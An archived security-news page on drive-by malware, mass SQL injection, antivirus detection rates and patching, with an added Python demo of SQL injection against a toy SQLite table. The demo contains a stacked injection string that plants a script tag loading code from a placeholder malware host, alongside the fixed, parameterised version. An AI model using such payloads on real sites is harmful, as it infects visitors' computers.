DON'T SURF IN THE NUDE
Security on a Shoestring
Security issues in the news - 3/7/08
With malware as prevalent on the internet as the items below describe, it's vital to keep all web-facing software up to date, so that known vulnerabilities cannot be exploited to install malware during normal browsing of perfectly reputable web sites. With this in mind, it's alarming that around 40% of web users appear to be surfing with out-of-date, unsafe browsers. Security Fix.

Browser safety

Still on the 'infected site' theme, the Guardian has an interesting article on 'poisoned' search results at Google, where links in a Google search direct browsers to malicious sites that try to install malware either by the use of exploits or by fooling the user into downloading a Trojan horse by social engineering.

What's an IFrame attack and why should I care? guardian.co.uk

The best way to stay safe against exploits is to keep all your software patched; the Secunia Software Inspector checks which of the programs on your computer are out of date.



8/5/08


A basic web page consists of text, pictures and links. Web developers add features to a page using programs which run either on the user's computer (in the browser) or on the server. Programs on the server can alter a web page according to who visits it, and have the page display information particular to that visitor.

Both browser-based and server-based web applications may contain security vulnerabilities that can be exploited to infect a visiting computer if a web site is compromised (hacked) or carries compromised third-party content (typically ads from hacked ad servers). Browser-side programs and plug-ins such as JavaScript, Java, Flash, QuickTime, RealPlayer and so on have all had such vulnerabilities in the past. However, the big story recently has been server-side web infections serving up malware. Malware pushers have been feeding malicious SQL commands to the database programs behind web sites, so that the pages those sites generate from the database now carry a link to a malware-serving server and try to infect every visiting computer.

The problem is widespread, with thousands of web sites affected. The big difference from previous attacks is that the web servers themselves have not been broken into: the malicious content is 'injected' into the behind-the-scenes (SQL) database by passing crafted input through the site's own web forms or URL parameters, which the site then pastes into a database command without proper checking (SQL injection). This is a flaw in the site's own code rather than in the server software, so keeping the server patched does not, by itself, prevent it.
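The attack described above, as an added example that is not part of the original page or of any of the reports linked here. It uses an in-memory SQLite database standing in for a site's SQL back end: a page-view counter that pastes the article id from the URL straight into its SQL lets an attacker append a script tag to every title in the table, so every later visitor's page carries it. The hardened counter binds the id as a parameter, and the renderer shows why escaping on output is a useful second layer. The script URL is a constructed placeholder.

```python
import html
import sqlite3

# Constructed payload for the demo; the host name is a placeholder, not a real site.
PAYLOAD = "<script src=\"http://malware.example/x.js\"></script>"


def setup_db():
    # Tiny stand-in for a site's database: two articles, no views yet.
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, views INTEGER DEFAULT 0)"
    )
    conn.executemany("INSERT INTO articles (title) VALUES (?)", [("Welcome",), ("Site news",)])
    conn.commit()
    return conn


def count_view_vulnerable(conn, article_id):
    # The id from the query string is concatenated into the SQL text, and
    # executescript() runs the whole batch (as a database server that accepts
    # multi-statement batches would). A second statement smuggled in after a
    # ';' runs with the site's own database privileges.
    sql = "UPDATE articles SET views = views + 1 WHERE id = " + article_id
    conn.executescript(sql)
    conn.commit()


def count_view_fixed(conn, article_id):
    # Check the type first, then bind the value as a parameter so the database
    # never interprets user input as SQL.
    article_id = int(article_id)  # raises ValueError on "1; UPDATE ..."
    conn.execute("UPDATE articles SET views = views + 1 WHERE id = ?", (article_id,))
    conn.commit()


def render_titles(conn, escape=False):
    # What a visitor's browser receives. With escape=True a tampered title is
    # shown as text rather than executed, which limits the damage even if the
    # injection succeeded.
    rows = conn.execute("SELECT title FROM articles ORDER BY id").fetchall()
    return "\n".join(
        "<h2>%s</h2>" % (html.escape(title) if escape else title) for (title,) in rows
    )


def attack_string():
    # Stacked statement: finish the intended UPDATE, then append the script tag
    # to every title. This is the shape of the mass injections described above.
    return "1; UPDATE articles SET title = title || '" + PAYLOAD + "'"


def demo_attack():
    # Returns the HTML later visitors would get from the vulnerable site.
    conn = setup_db()
    count_view_vulnerable(conn, attack_string())
    return render_titles(conn)


def demo_fixed():
    # Returns (attack_was_blocked, HTML) for the hardened site.
    conn = setup_db()
    try:
        count_view_fixed(conn, attack_string())
        blocked = False
    except ValueError:
        blocked = True
    return blocked, render_titles(conn)


if __name__ == "__main__":
    print(demo_attack())
    print(demo_fixed())
```

Run it and the first printout shows both headings ending in the injected script tag; the second shows the hardened counter rejecting the input and the titles untouched.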

Web infection attacks more than 100,000 pages The Register
Hundreds of Thousands of Microsoft Web Servers Hacked Security Fix
Thousands of More Hacked Websites Targeting Your Passwords Shadowserver
Hundreds of thousands of SQL injections SANS
Mass SQL Injection F-Secure

The good news is that exploits served up by infected sites do not seem to affect a fully patched computer. Once again, a good reason to keep up-to-date and use Secunia services to check for vulnerable software.

Secunia Software inspector
Secunia Personal Software Inspector

28/2/08

Malware is becoming more numerous, more prevalent and harder to remove.

The growth in malware.

Data from Andreas Marx at AV-Test.org on unique malware samples plotted against year, posted on the Sunbelt blog with this comment:

It's worth noting that these numbers are also increasing because of variants -- i.e. the same Trojan will be changed sometimes hourly or daily just to try and fool the scanners. So it's not like there's over 5 million unique pieces of malware. There are many that are variants of the same piece of malware.

Nevertheless, this is a good representation of the staggering load of malware that anti-malware folks are under. Like most companies, we’re processing gigabytes of malware daily.

Harmful sites in Search results.

Data on the prevalence of malware on the web from Google.

It has been over a year and a half since we started to identify web pages that infect vulnerable hosts via drive-by downloads, i.e. web pages that attempt to exploit their visitors by installing and running malware automatically. During that time we have investigated billions of URLs and found more than three million unique URLs on over 180,000 web sites automatically installing malware. During the course of our research, we have investigated not only the prevalence of drive-by downloads but also how users are being exposed to malware and how it is being distributed. Our research paper is currently under peer review, but we are making a technical report [PDF] available now.

Google Online Security Blog

The prevalence of malware is partly explained by a tactic recently deployed by malware pushers: injecting malware into advertisements displayed on legitimate sites via third-party ad servers. The Register, Sunbelt Blog

Detection rates

The Google report above also identifies how anti-virus programs are failing to keep up with the growth in malware numbers, as this graph of detection rates shows.

In what follows, we evaluate the potential implications of the web malware delivery mechanism by measuring the detection rates of several well known anti-virus engines. Specifically, we evaluate the detection rate of each anti-virus engine against the set of suspected malware samples collected by our infrastructure. Since we cannot rely on anti-virus engines, we developed a heuristic to detect these suspected binaries before subjecting them to the anti-virus scanners. For each inspected URL via our in-depth verification system we test whether visiting the URL caused the creation of at least one new process on the virtual machine. For the URLs that satisfy this condition, we simply extract any binary download(s) from the recorded HTTP response and “flag” them as suspicious.

We applied the above methodology to identify suspicious binaries on a daily basis over a one month period of April, 2007. We subject each binary to each of the anti-virus scanners using the latest virus definitions on that day. Then, for an anti-virus engine, the detection rate is simply the number of detected (flagged) samples divided by the total number of suspicious malware instances inspected on that day. Figure 15 illustrates the individual detection rates of each of the anti-virus engines. The graph reveals that the detection capability of the anti-virus engines is lacking, with an average detection rate of 70% for the best engine. These results are disturbing as they show that even the best anti-virus engines in the market (armed with their latest definitions) fail to cover a significant fraction of web malware.

Technical Report (PDF)

It's not only that detection rates are failing to keep up with the growth in malware that makes removal more difficult: malware is also using more advanced techniques to resist removal. One of the most egregious culprits is the Vundo/Virtumonde Trojan, which pushes scam anti-virus products:

Vundo creates a DLL file in the Windows system32 directory and writes registry entries, causing Windows to inject the file into winlogon.exe and many other programs.

Wikipedia

A tool that seems to be having some success in keeping up with Vundo is ComboFix; it's worth a try in the case of persistent pop-ups for scam anti-virus products that other anti-spyware products just won't remove.

It's worth pointing out that however prevalent malware becomes, it's still easy to avoid by following some simple precautions: don't download programs from untrusted sites, don't open attachments received by email or IM, even if they appear to come from a friend, and keep all software up to date to avoid malware installation through security holes. Use the Secunia Software Inspector below to check for out-of-date and vulnerable software on your computer.

The latest software vulnerability to hit the news (and those slow to update) is in Adobe's Acrobat program. Banner ads are used to serve malicious PDF files that exploit the vulnerability, a tactic mentioned above, so the malware may be encountered on "safe" sites if they happen to carry ads from a compromised third-party ad server. Sunbelt Blog



Security News from 2007

Security news from 2006

Security news from 2005